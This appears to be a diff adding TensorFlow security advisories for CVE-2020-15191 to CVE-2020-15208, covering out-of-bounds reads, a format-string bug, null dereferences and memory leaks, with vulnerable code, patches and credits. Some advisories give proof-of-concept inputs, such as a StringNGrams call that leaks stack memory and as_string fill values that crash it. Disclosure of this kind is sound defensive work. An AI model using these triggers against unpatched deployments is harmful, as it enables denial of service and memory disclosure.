@@ -0,0 +1,44 @@
## TFSA-2020-008: Data corruption due to dimension mismatch in TFLite
### CVE Number
CVE-2020-15208
### Impact
When determining the common dimension size of two tensors, [TFLite uses a
`DCHECK`](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442)
which is no-op outside of debug compilation modes:
```cc
// Get common shape dim, DCHECKing that they all agree.
inline int MatchingDim(const RuntimeShape& shape1, int index1,
const RuntimeShape& shape2, int index2) {
TFLITE_DCHECK_EQ(shape1.Dims(index1), shape2.Dims(index2));
return shape1.Dims(index1);
}
```
Since the function always returns the dimension of the first tensor, malicious
attackers can craft cases where this is larger than that of the second tensor.
In turn, this would result in reads/writes outside of bounds since the
interpreter will wrongly assume that there is enough data in both tensors.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[8ee24e7949a20](https://github.com/tensorflow/tensorflow/commit/8ee24e7949a20)
and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,43 @@
## TFSA-2020-009: Segfault and data corruption caused by negative indexing in TFLite
### CVE Number
CVE-2020-15207
### Impact
To mimic Python's indexing with negative values, TFLite uses `ResolveAxis` to
convert negative values to positive indices. However, the only check that the
converted index is now valid is [only present in debug
builds](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72):
```cc
// Handle negative index. A positive index 'p_idx' can be represented as a
// negative index 'n_idx' as: n_idx = p_idx-num_dims
// eg: For num_dims=3, [0, 1, 2] is the same as [-3, -2, -1] */
int current = axis[idx] < 0 ? (axis[idx] + num_dims) : axis[idx];
TFLITE_DCHECK(current >= 0 && current < num_dims);
```
If the `DCHECK` does not trigger, then code execution moves ahead with a
negative index. This, in turn, results in accessing data out of bounds which
results in segfaults and/or data corruption.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[2d88f470dea2671b430884260f3626b1fe99830a](https://github.com/tensorflow/tensorflow/commit/2d88f470dea2671b430884260f3626b1fe99830a)
and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,44 @@
## TFSA-2020-010: Incomplete validation in TensorFlow's SavedModel's constant nodes causes segfaults
### CVE Number
CVE-2020-15206
### Impact
Changing the TensorFlow's `SavedModel` protocol buffer and altering the name of
required keys results in segfaults and data corruption while loading the model.
This can cause a denial of service in products using `tensorflow-serving` or
other inference-as-a-service installments.
We have added fixes to this in
[f760f88b4267d981e13f4b302c437ae800445968](https://github.com/tensorflow/tensorflow/commit/f760f88b4267d981e13f4b302c437ae800445968)
and
[fcfef195637c6e365577829c4d67681695956e7d](https://github.com/tensorflow/tensorflow/commit/fcfef195637c6e365577829c4d67681695956e7d)
(both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier
versions). However, this was not enough, as #41097 reports a different failure
mode.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[adf095206f25471e864a8e63a0f1caef53a0e3a6](https://github.com/tensorflow/tensorflow/commit/adf095206f25471e864a8e63a0f1caef53a0e3a6)
and will release patch releases for all versions between 1.15 and 2.3. Patch
releases for versions between 1.15 and 2.1 will also contain cherry-picks of
[f760f88b4267d981e13f4b302c437ae800445968](https://github.com/tensorflow/tensorflow/commit/f760f88b4267d981e13f4b302c437ae800445968)
and
[fcfef195637c6e365577829c4d67681695956e7d](https://github.com/tensorflow/tensorflow/commit/fcfef195637c6e365577829c4d67681695956e7d).
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Shuaike Dong, from Alipay Tian Qian
Security Lab && Lab for Applied Security Research, CUHK.
@@ -0,0 +1,42 @@
## TFSA-2020-011: Data leak in `tf.raw_ops.StringNGrams`
### CVE Number
CVE-2020-15205
### Impact
The `data_splits` argument of
[`tf.raw_ops.StringNGrams`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/StringNGrams)
lacks validation. This allows a user to pass values that can cause heap
overflow errors and even leak contents of memory
```python
>>> tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False)
StringNGrams(ngrams=<tf.Tensor: shape=(6,), dtype=string, numpy=
array([b'aa bb cc', b'bb cc dd', b'cc dd ee', b'dd ee ff',
b'ee ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00',
b'ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00 \x9b~\xa8q\x7f\x00\x00p\xf5j\xa7q\x7f\x00\x00H\xf8j\xa7q\x7f\x00\x00\xf0\xf3\xf7\x85q\x7f\x00\x00`}\xa6\x00\x00\x00\x00\x00`~\xa6\x00\x00\x00\x00\x00\xb0~\xeb\x9bq\x7f\x00'],...
```
All the binary strings after `ee ff` are contents from the memory stack. Since
these can contain return addresses, this data leak can be used to defeat ASLR.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[0462de5b544ed4731aa2fb23946ac22c01856b80](https://github.com/tensorflow/tensorflow/commit/0462de5b544ed4731aa2fb23946ac22c01856b80)
and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,38 @@
## TFSA-2020-012: Segfault by calling session-only ops in eager mode
### CVE Number
CVE-2020-15204
### Impact
In eager mode, TensorFlow does not set the session state. Hence, calling
`tf.raw_ops.GetSessionHandle` or `tf.raw_ops.GetSessionHandleV2` results in a
[null pointer
dereference](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45):
```cc
int64 id = ctx->session_state()->GetNewId();
```
In the above snippet, in eager mode, `ctx->session_state()` returns `nullptr`.
Since code immediately dereferences this, we get a segmentation fault.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[9a133d73ae4b4664d22bd1aa6d654fec13c52ee1](https://github.com/tensorflow/tensorflow/commit/9a133d73ae4b4664d22bd1aa6d654fec13c52ee1)
and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,81 @@
## TFSA-2020-013: Format-string vulnerability in TensorFlow's `as_string`
### CVE Number
CVE-2020-15203
### Impact
By controlling the `fill` argument of
[`tf.strings.as_string`](https://www.tensorflow.org/api_docs/python/tf/strings/as_string),
a malicious attacker is able to trigger a format string vulnerability due to the
way the internal format use in a `printf` call is
[constructed](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74):
```cc
format_ = "%";
if (width > -1) {
strings::Appendf(&format_, "%s%d", fill_string.c_str(), width);
}
if (precision > -1) {
strings::Appendf(&format_, ".%d", precision);
}
```
This can result in unexpected output:
```python
In [1]: tf.strings.as_string(input=[1234], width=6, fill='-')
Out[1]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['1234 '],
dtype=object)>
In [2]: tf.strings.as_string(input=[1234], width=6, fill='+')
Out[2]: <tf.Tensor: shape=(1,), dtype=string, numpy=array([' +1234'],
dtype=object)>
In [3]: tf.strings.as_string(input=[1234], width=6, fill="h")
Out[3]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['%6d'],
dtype=object)>
In [4]: tf.strings.as_string(input=[1234], width=6, fill="d")
Out[4]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['12346d'],
dtype=object)>
In [5]: tf.strings.as_string(input=[1234], width=6, fill="o")
Out[5]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['23226d'],
dtype=object)>
In [6]: tf.strings.as_string(input=[1234], width=6, fill="x")
Out[6]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['4d26d'],
dtype=object)>
In [7]: tf.strings.as_string(input=[1234], width=6, fill="g")
Out[7]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['8.67458e-3116d'],
dtype=object)>
In [8]: tf.strings.as_string(input=[1234], width=6, fill="a")
Out[8]: <tf.Tensor: shape=(1,), dtype=string,
numpy=array(['0x0.00ff7eebb4d4p-10226d'], dtype=object)>
In [9]: tf.strings.as_string(input=[1234], width=6, fill="c")
Out[9]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['\xd26d'],
dtype=object)>
In [10]: tf.strings.as_string(input=[1234], width=6, fill="p")
Out[10]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['0x4d26d'],
dtype=object)>
In [11]: tf.strings.as_string(input=[1234], width=6, fill='m')
Out[11]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['Success6d'],
dtype=object)>
```
However, passing in `n` or `s` results in segmentation fault.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[33be22c65d86256e6826666662e40dbdfe70ee83](https://github.com/tensorflow/tensorflow/commit/33be22c65d86256e6826666662e40dbdfe70ee83)
and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,53 @@
## TFSA-2020-014: Integer truncation in Shard API usage
### CVE Number
CVE-2020-15202
### Impact
The [`Shard`
API](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60)
in TensorFlow expects the last argument to be a function taking two `int64`
(i.e., `long long`) arguments:
```cc
void Shard(int max_parallelism, thread::ThreadPool* workers, int64 total,
int64 cost_per_unit, std::function<void(int64, int64)> work);
```
However, there are several places in TensorFlow where a lambda taking `int` or
`int32` arguments is [being
used](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205):
```cc
auto DoWork = [samples_per_alpha, num_alphas, &rng, samples_flat,
alpha_flat](int start_output, int limit_output) {...};
Shard(worker_threads.num_threads, worker_threads.workers,
num_alphas * samples_per_alpha, kElementCost, DoWork);
```
In these cases, if the amount of work to be parallelized is large enough,
integer truncation occurs. Depending on how the two arguments of the lambda are
used, this can result in segfaults, read/write outside of heap allocated arrays,
stack overflows, or data corruption.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[27b417360cbd671ef55915e4bb6bb06af8b8a832](https://github.com/tensorflow/tensorflow/commit/27b417360cbd671ef55915e4bb6bb06af8b8a832)
and
[ca8c013b5e97b1373b3bb1c97ea655e69f31a575](https://github.com/tensorflow/tensorflow/commit/ca8c013b5e97b1373b3bb1c97ea655e69f31a575).
We will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,43 @@
## TFSA-2020-015: Heap buffer overflow due to invalid splits in RaggedCountSparseOutput
### CVE Number
CVE-2020-15201
### Impact
The `RaggedCountSparseOutput` implementation does not validate that the input
arguments form a valid ragged tensor. In particular, there is no validation that
the values in the `splits` tensor generate a valid partitioning of the `values`
tensor. Hence, this code is prone to [heap buffer
overflow](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L251):
```cc
for (int idx = 0; idx < num_values; ++idx) {
while (idx >= splits_values(batch_idx)) {
batch_idx++;
}
// ...
}
```
If `split_values` does not end with a value at least `num_values` then the
`while` loop condition will trigger a read outside of the bounds of
`split_values` once `batch_idx` grows too large.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,51 @@
## TFSA-2020-016: Segfault due to invalid splits in RaggedCountSparseOutput
### CVE Number
CVE-2020-15200
### Impact
The `RaggedCountSparseOutput` implementation does not validate that the input
arguments form a valid ragged tensor. In particular, there is no validation that
the values in the `splits` tensor generate a valid partitioning of the `values`
tensor. Thus, the [following
code](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L265
) sets up conditions to cause a heap buffer overflow:
```cc
auto per_batch_counts = BatchedMap<W>(num_batches);
int batch_idx = 0;
for (int idx = 0; idx < num_values; ++idx) {
while (idx >= splits_values(batch_idx)) {
batch_idx++;
}
const auto& value = values_values(idx);
if (value >= 0 && (maxlength_ <= 0 || value < maxlength_)) {
per_batch_counts[batch_idx - 1][value] = 1;
}
}
```
A `BatchedMap` is equivalent to a vector where each element is a hashmap.
However, if the first element of `splits_values` is not 0, `batch_idx` will
never be 1, hence there will be no hashmap at index 0 in `per_batch_counts`.
Trying to access that in the user code results in a segmentation fault.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md).
@@ -0,0 +1,41 @@
## TFSA-2020-017: Abort due to invalid splits in RaggedCountSparseOutput
### CVE Number
CVE-2020-15199
### Impact
The `RaggedCountSparseOutput` does not validate that the input arguments form a
valid ragged tensor. In particular, there is no validation that the `splits`
tensor has the minimum required number of elements. Code uses this quantity to
[initialize a different data
structure](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L241-L244):
```cc
int num_batches = splits.NumElements() - 1;
auto per_batch_counts = BatchedMap<W>(num_batches);
```
Since `BatchedMap` is equivalent to a vector, it needs to have at least one
element to not be `nullptr`. If user passes a `splits` tensor that is empty or
has exactly one element, we get a `SIGABRT` signal raised by the operating
system.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md).
@@ -0,0 +1,42 @@
## TFSA-2020-018: Heap buffer overflow due to invalid indices in SparseCountSparseOutput
### CVE Number
CVE-2020-15198
### Impact
The `SparseCountSparseOutput` implementation does not validate that the input
arguments form a valid sparse tensor. In particular, there is no validation that
the `indices` tensor has the same shape as the `values` one. The values in these
tensors are always [accessed in
parallel](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L193-L195):
```cc
for (int idx = 0; idx < num_values; ++idx) {
int batch = is_1d ? 0 : indices_values(idx, 0);
const auto& value = values_values(idx);
// ...
}
```
Thus, a shape mismatch can result in accesses outside the bounds of heap
allocated buffers.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md).
@@ -0,0 +1,40 @@
## TFSA-2020-019: Crash due to invalid splits in SparseCountSparseOutput
### CVE Number
CVE-2020-15197
### Impact
The `SparseCountSparseOutput` implementation does not validate that the input
arguments form a valid sparse tensor. In particular, there is no validation that
the `indices` tensor has rank 2. This tensor must be a matrix because code
assumes its elements are [accessed as elements of a
matrix](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L185):
```cc
const auto indices_values = indices.matrix<int64>();
```
However, malicious users can pass in tensors of different rank, resulting in a
`CHECK` assertion failure and a crash. This can be used to cause denial of
service in serving installations, if users are allowed to control the components
of the input sparse tensor.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md).
@@ -0,0 +1,55 @@
## TFSA-2020-020: Heap buffer overflow in weighted sparse count ops
### CVE Number
CVE-2020-15196
### Impact
The `SparseCountSparseOutput` and `RaggedCountSparseOutput` implementations
don't validate that the `weights` tensor has the same shape as the data. The
check exists for `DenseCountSparseOutput`, where both tensors are [fully
specified](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117):
```cc
if (use_weights) {
OP_REQUIRES(
context, weights.shape() == data.shape(),
errors::InvalidArgument(
"Weights and data must have the same shape. Weight shape: ",
weights.shape().DebugString(),
"; data shape: ", data.shape().DebugString()));
}
```
In the sparse and ragged count weights are still accessed [in parallel with the
data](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201):
```cc
for (int idx = 0; idx < num_values; ++idx) {
int batch = is_1d ? 0 : indices_values(idx, 0);
const auto& value = values_values(idx);
per_batch_counts[batch][value] += weight_values(idx);
}
```
But, since there is no validation, a user passing fewer weights than the values
for the tensors can generate a read from outside the bounds of the heap buffer
allocated for the weights.
### Vulnerable Versions
TensorFlow 2.3.0.
### Patches
We have patched the issue in
[3cbb917b4714766030b28eba9fb41bb97ce9ee02](https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02)
and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md).
@@ -0,0 +1,36 @@
## TFSA-2020-021: Heap buffer overflow in SparseFillEmptyRowsGrad
### CVE Number
CVE-2020-15195
### Impact
The implementation of `SparseFillEmptyRowsGrad` uses a [double indexing
pattern](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L263-L269):
```cc
d_values(i) = grad_values(reverse_index_map(i));
```
It is possible for `reverse_index_map(i)` to be an index outside of bounds of
`grad_values`, thus resulting in a heap buffer overflow.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[390611e0d45c5793c7066110af37c8514e6a6c54](https://github.com/tensorflow/tensorflow/commit/390611e0d45c5793c7066110af37c8514e6a6c54)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,46 @@
## TFSA-2020-022: Crash due to invalid shape of `grad_values` in SparseFillEmptyRowsGrad
### CVE Number
CVE-2020-15194
### Impact
The `SparseFillEmptyRowsGrad` implementation has [incomplete validation of the
shapes of its
arguments](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241):
```cc
OP_REQUIRES(
context, TensorShapeUtils::IsVector(reverse_index_map_t->shape()),
errors::InvalidArgument("reverse_index_map must be a vector, saw: ",
reverse_index_map_t->shape().DebugString()));
const auto reverse_index_map = reverse_index_map_t->vec<int64>();
const auto grad_values = grad_values_t->vec<T>();
```
Although `reverse_index_map_t` and `grad_values_t` are accessed in a similar
pattern, only `reverse_index_map_t` is validated to be of proper shape. Hence,
malicious users can pass a bad `grad_values_t` to trigger an assertion failure
in `vec`, causing denial of service in serving installations.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[390611e0d45c5793c7066110af37c8514e6a6c54](https://github.com/tensorflow/tensorflow/commit/390611e0d45c5793c7066110af37c8514e6a6c54)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-021.md).
@@ -0,0 +1,52 @@
## TFSA-2020-023: Memory corruption in `dlpack.to_dlpack`
### CVE Number
CVE-2020-15193
### Impact
The implementation of `dlpack.to_dlpack` can be made to use uninitialized
memory resulting in further memory corruption. This is because the pybind11
glue code [assumes that the argument is a
tensor](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/tfe_wrapper.cc#L1361):
```cc
TFE_TensorHandle* thandle = EagerTensor_Handle(eager_tensor_pyobject_ptr);
```
However, there is nothing stopping users from passing in a Python object instead of a tensor.
```python
In [2]: tf.experimental.dlpack.to_dlpack([2])
==1720623==WARNING: MemorySanitizer: use-of-uninitialized-value
#0 0x55b0ba5c410a in tensorflow::(anonymous namespace)::GetTensorFromHandle(TFE_TensorHandle*, TF_Status*) third_party/tensorflow/c/eager/dlpack.cc:46:7
#1 0x55b0ba5c38f4 in tensorflow::TFE_HandleToDLPack(TFE_TensorHandle*, TF_Status*) third_party/tensorflow/c/eager/dlpack.cc:252:26
...
```
The uninitialized memory address is due to a
[`reinterpret_cast`](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/eager/pywrap_tensor.cc#L848-L850):
```cc
TFE_TensorHandle* EagerTensor_Handle(const PyObject* o) {
return reinterpret_cast<const EagerTensor*>(o)->handle;
}
```
Since the `PyObject` is a Python object, not a TensorFlow Tensor, the cast to `EagerTensor` fails.
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[22e07fb204386768e5bcbea563641ea11f96ceb8](https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,50 @@
## TFSA-2020-024: Memory leak in `dlpack.to_dlpack`
### CVE Number
CVE-2020-15192
### Impact
If a user passes a list of strings to `dlpack.to_dlpack` there is a memory leak
following an expected [validation failure](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L100-L104):
```cc
status->status = tensorflow::errors::InvalidArgument(
DataType_Name(static_cast<DataType>(data_type)),
" is not supported by dlpack");
```
The allocated memory is
[from](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L256):
```cc
auto* tf_dlm_tensor_ctx = new TfDlManagedTensorCtx(tensor_ref);
```
The issue occurs because the `status` argument during validation failures [is not
properly checked](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267):
```cc
dlm_tensor->dl_tensor.data = TFE_TensorHandleDevicePointer(h, status);
dlm_tensor->dl_tensor.dtype = GetDlDataType(data_type, status);
```
Since each of the above methods can return an error status, the `status` value
must be checked before continuing.
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[22e07fb204386768e5bcbea563641ea11f96ceb8](https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-023.md).
@@ -0,0 +1,47 @@
## TFSA-2020-025: Undefined behavior in `dlpack.to_dlpack`
### CVE Number
CVE-2020-15191
